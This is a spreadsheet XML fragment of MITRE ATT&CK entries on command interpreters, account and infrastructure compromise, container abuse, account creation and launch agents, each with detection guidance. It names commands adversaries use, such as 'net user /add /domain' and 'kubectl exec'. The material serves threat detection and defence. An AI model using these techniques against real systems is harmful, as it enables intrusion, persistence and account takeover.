Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Network Device CLI</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>20 October 2020</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>Command: Command Execution</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Python</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts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</si>
  <si>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T1059.004</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage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 </t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Visual Basic</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/005</t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. 
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently 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</si>
  <si>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T1586.002</t>
  </si>
  <si>
    <t>Compromise Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1586.001</t>
  </si>
  <si>
    <t>Compromise Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently 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</si>
  <si>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T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.
Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Compromise Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/004</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t xml:space="preserve">Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. </t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Brad Geesaman, @bradgeesaman; Center for Threat-Informed Defense (CTID); David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t xml:space="preserve">Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. </t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Cluster: Cluster Metadata, Container: Container Enumeration, Container: Container Metadata, Pod: Pod Enumeration, Pod: Pod Metadata</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Create Account: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>29 January 2020</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Create Account: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>28 January 2020</t>
  </si>
  <si>
    <t>23 March 2020</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Agent</t>
  </si>
  <si>
    <t>Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>17 January 2020</t>
  </si>
  <si>
